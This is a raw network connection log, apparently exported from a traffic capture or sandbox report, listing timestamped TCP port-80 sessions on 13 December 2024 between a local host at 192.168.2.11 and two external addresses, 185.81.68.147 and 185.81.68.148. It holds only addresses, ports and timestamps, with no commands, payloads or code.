                                                                                                                                                                                                Dec 13, 2024 08:22:07.231102943 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.287388086 CET8050168185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.324707031 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.324939013 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.333086014 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.336998940 CET5016980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.456701040 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.934087038 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:08.324959040 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:08.393556118 CET8050167185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:08.393657923 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:08.503388882 CET8050168185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:08.503504992 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:08.512202024 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:08.907696009 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:08.907983065 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:08.908035040 CET5016980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:08.909073114 CET5016980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.012888908 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.028913021 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:09.132728100 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:09.132812023 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.132899046 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.252867937 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:09.252950907 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.372905970 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:09.731038094 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:09.809133053 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.121599913 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.244642019 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.244932890 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.245012999 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.245104074 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365073919 CET8050171185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365117073 CET8050172185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365132093 CET8050168185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365211964 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365230083 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365469933 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365772963 CET8050167185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.365832090 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.383579016 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.383725882 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.503719091 CET8050171185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.503763914 CET8050172185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.584680080 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.584731102 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.584800005 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.586095095 CET5017080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.621573925 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:10.700098991 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.705929041 CET8050170185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.819922924 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.820005894 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.820060968 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.824738026 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:10.939728975 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:10.939845085 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:11.012207031 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:11.060178995 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:11.706630945 CET8050172185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:11.706686020 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:11.721841097 CET8050171185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:11.721972942 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:12.271449089 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:12.271478891 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:12.271542072 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.272877932 CET5017380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.387612104 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.392838955 CET8050173185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:12.507496119 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:12.507575989 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.507644892 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.627425909 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:12.627506018 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:12.747278929 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.421051025 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:13.421374083 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:13.424053907 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:13.424276114 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:13.541114092 CET8050175185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.541184902 CET8050172185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.541239977 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:13.541270018 CET5017280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:13.541955948 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:13.544096947 CET8050176185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.544178009 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:13.544286013 CET8050171185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.544384956 CET5017180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:13.546480894 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:13.661660910 CET8050175185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:13.666346073 CET8050176185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.154623032 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.154658079 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.154736996 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.156039953 CET5017480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.262542009 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.275767088 CET8050174185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.382738113 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.382832050 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.382893085 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.502758980 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.502810001 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.621586084 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.622580051 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.715440989 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.876646996 CET8050175185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.876739979 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:14.893364906 CET8050176185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:14.893465996 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:15.512212992 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:15.809314013 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:15.834300041 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:15.834319115 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:15.834420919 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:15.835855007 CET5017780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:15.918502092 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:15.918504000 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:15.950395107 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:15.955579042 CET8050177185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.070202112 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.070486069 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.070486069 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.190535069 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.190671921 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.310600042 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.669714928 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:16.670043945 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:16.670181036 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.670445919 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790318012 CET8050179185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790338039 CET8050176185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790473938 CET5017680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790576935 CET8050180185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790631056 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790633917 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790673971 CET8050175185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.790730000 CET5017580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.795777082 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:16.795908928 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:16.915544033 CET8050179185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:16.915560007 CET8050180185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:17.677285910 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:17.677383900 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:17.677486897 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:17.678673983 CET5017880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:17.793803930 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:17.798398972 CET8050178185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:17.913549900 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:17.913650036 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:17.913678885 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:18.033710957 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:18.035407066 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:18.155428886 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:18.158787012 CET8050179185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:18.158976078 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:18.159120083 CET8050180185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:18.159288883 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.539098978 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.539258003 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.539364100 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.540494919 CET5018180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.653309107 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.660557985 CET8050181185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.773436069 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.773542881 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.773605108 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.865516901 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.865741014 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.865859985 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:19.866148949 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:19.893589973 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.893659115 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.985531092 CET8050183185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.985630989 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.985826969 CET8050180185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.985889912 CET5018080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:19.986161947 CET8050184185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.986234903 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:19.986284018 CET8050179185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:19.986350060 CET5017980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:20.007838011 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:20.007839918 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:20.013586044 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:20.127979040 CET8050183185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:20.128026962 CET8050184185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.213246107 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.213344097 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.213428020 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.214757919 CET5018280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.324668884 CET8050183185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.324757099 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.325099945 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.330708981 CET8050184185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.330796957 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:21.334403992 CET8050182185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.444871902 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.445012093 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.445080996 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.564901114 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:21.565032005 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:21.684818983 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:22.889180899 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:22.889439106 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:22.892234087 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:22.892432928 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.009270906 CET8050186185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.009391069 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:23.009524107 CET8050184185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.009584904 CET5018480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:23.012190104 CET8050187185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.012223959 CET8050183185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.012263060 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.012305975 CET5018380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.030854940 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:23.031090975 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.053111076 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.053148031 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.053257942 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.054589987 CET5018580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.150907040 CET8050186185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.150954962 CET8050187185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.168869972 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.174365044 CET8050185185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.288899899 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.289016962 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.289083004 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.409555912 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:23.409636021 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:23.529656887 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.231026888 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.324745893 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.361773014 CET8050186185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.361888885 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:24.382711887 CET8050187185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.382802010 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.740657091 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.740833998 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.740906954 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.742172003 CET5018880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.857181072 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.861932993 CET8050188185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.977138042 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:24.977314949 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:24.979557037 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:25.099391937 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:25.099474907 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:25.219492912 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:25.418454885 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:25.621695042 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.101993084 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.102252960 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.121604919 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.131814003 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.132114887 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.221951962 CET8050190185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.222039938 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.222121954 CET8050186185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.222171068 CET5018680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.248346090 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.251831055 CET8050191185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.251948118 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.251971960 CET8050187185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.252022982 CET5018780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.254205942 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.368158102 CET8050190185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.374038935 CET8050191185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.599565983 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.599647045 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.599724054 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.601069927 CET5018980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.621659040 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:26.715708017 CET5019280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.720813036 CET8050189185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.835786104 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.835930109 CET5019280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.836035013 CET5019280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:26.956270933 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:26.956418991 CET5019280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:27.076349974 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:27.564786911 CET8050190185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:27.564928055 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:27.598795891 CET8050191185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:27.598875999 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.312233925 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:28.312294006 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:28.312352896 CET5019280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.313662052 CET5019280192.168.2.11185.81.68.147
